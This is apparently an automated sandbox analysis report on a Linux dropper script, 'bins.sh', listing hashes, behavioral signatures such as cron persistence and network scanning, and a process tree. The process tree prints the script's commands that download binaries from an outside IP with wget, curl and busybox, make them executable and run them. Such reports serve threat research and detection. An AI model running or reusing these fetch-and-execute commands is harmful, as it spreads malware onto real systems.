Analysis
-
max time kernel
149s -
max time network
179s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
09-11-2024 15:42
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
aea24efa7797a187bea2466ccf0a14f6
-
SHA1
c8d1d5d93b70c8de6098941ba438058be2d26403
-
SHA256
9b07515ab2261e313dfe889834a1d3e657eac7132cc863d56050ecdd9a36e25e
-
SHA512
b4e53ccc6bb5387f2a0cf1429e8e6ca8703f0f437c82026ddabe93d4537b70b2ee338a087dfc83f18b534a471029a4396a57955b45ce9f95f4e7139d7dcc7868
-
SSDEEP
192:v/E/Q/Iz/zUoVb57XGSC7jd9lpX/IoJJBF/E/Q/Iz/z1balpX/IoLGSC7jG:vM4kwon7XGSC7jd9lpvIoJNM4k8lpvIm
Malware Config
Signatures
-
Contacts a large (2188) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 3 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodpid process 696 chmod 732 chmod 769 chmod -
Executes dropped EXE 3 IoCs
Processes:
PZZBvluhwhSO2p8iibQDofx2gfTy59AqVWRRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUcilH0kGjseMzL73jFo6nsq2lmprj57zQmQC5ioc pid process /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW 697 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci 733 RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 770 lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 -
Renames itself 1 IoCs
Processes:
lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5pid process 771 lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.yfyb4c crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 3 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5curlcrontabdescription ioc process File opened for reading /proc/871/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/931/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1006/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1023/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1024/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1126/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/823/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/856/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/885/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/935/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1081/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1154/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1174/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/802/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/803/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/643/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/971/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1055/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1065/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1101/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/949/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/148/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/787/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/844/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/877/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/786/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/920/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/948/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1068/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/881/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1001/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1046/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/961/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/980/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1092/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1141/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1162/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1062/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/792/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/847/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1037/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/27/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/98/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/913/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1011/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1019/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1158/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/26/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/109/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/840/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/978/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/filesystems crontab File opened for reading /proc/18/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/794/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/997/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1060/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1109/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/839/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/849/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/853/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/1031/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/644/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 File opened for reading /proc/808/cmdline lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 -
Writes file to tmp directory 9 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetcurlcurlbusyboxcurlbusyboxbusyboxwgetdescription ioc process File opened for modification /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci wget File opened for modification /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 wget File opened for modification /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 curl File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW curl File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW busybox File opened for modification /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci curl File opened for modification /tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci busybox File opened for modification /tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5 busybox File opened for modification /tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:648
-
/usr/bin/wgetwget http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Writes file to tmp directory
PID:654 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:675 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Writes file to tmp directory
PID:682 -
/bin/chmodchmod 777 PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- File and Directory Permissions Modification
PID:696 -
/tmp/PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW./PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵
- Executes dropped EXE
PID:697 -
/bin/rmrm PZZBvluhwhSO2p8iibQDofx2gfTy59AqVW2⤵PID:699
-
/usr/bin/wgetwget http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵
- Writes file to tmp directory
PID:701 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:721 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵
- Writes file to tmp directory
PID:731 -
/bin/chmodchmod 777 RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵
- File and Directory Permissions Modification
PID:732 -
/tmp/RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci./RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵
- Executes dropped EXE
PID:733 -
/bin/rmrm RRNb6V64LVMOv5G3j2Wlb81iwAiY1fLUci2⤵PID:735
-
/usr/bin/wgetwget http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC52⤵
- Writes file to tmp directory
PID:736 -
/usr/bin/curlcurl -O http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC52⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:749 -
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC52⤵
- Writes file to tmp directory
PID:762 -
/bin/chmodchmod 777 lH0kGjseMzL73jFo6nsq2lmprj57zQmQC52⤵
- File and Directory Permissions Modification
PID:769 -
/tmp/lH0kGjseMzL73jFo6nsq2lmprj57zQmQC5./lH0kGjseMzL73jFo6nsq2lmprj57zQmQC52⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:770 -
/bin/shsh -c "crontab -l"3⤵PID:772
-
/usr/bin/crontabcrontab -l4⤵PID:773
-
/bin/shsh -c "crontab -"3⤵PID:774
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:775 -
/bin/rmrm lH0kGjseMzL73jFo6nsq2lmprj57zQmQC52⤵PID:777
-
/usr/bin/wgetwget http://216.126.231.240/bins/2BkcRt9likIjRh8QY2MQF6uprmyKtaXkDW2⤵PID:780
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e
-
Filesize
98KB
MD55141342d0df8699fa32a6b066a0c592e
SHA18157673225bd5182f16215e2aa823a25ca2d4fbc
SHA25654302d130cd356fb19ea5a763c5ab6b0892fc234118f10ba3196ec4245c83b4d
SHA512d6b24571e7691227abafc70133a1da007c97c2730c820de77a750d2c140a8a75554cc614b4729debc4ec5480124252737c5846a458a5146005285c6d3f9e3801
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
210B
MD59f1cb7324a266f4df76521a2de82caed
SHA11fc5d8381dbf4976ef5b0ee4a461f01e89dd7b07
SHA256a3c65f24b086da59d0c7f12879d40b6fa7e27e86b75f374956d4b721ca4dba38
SHA512b2efc144732f635314de1dc79e75cea6760b1fb6592a4fae98e8362d694ebab72f0002f9d65d3f523fc2504b9a3e50bbe03919b962066d542b21c9957ba087f4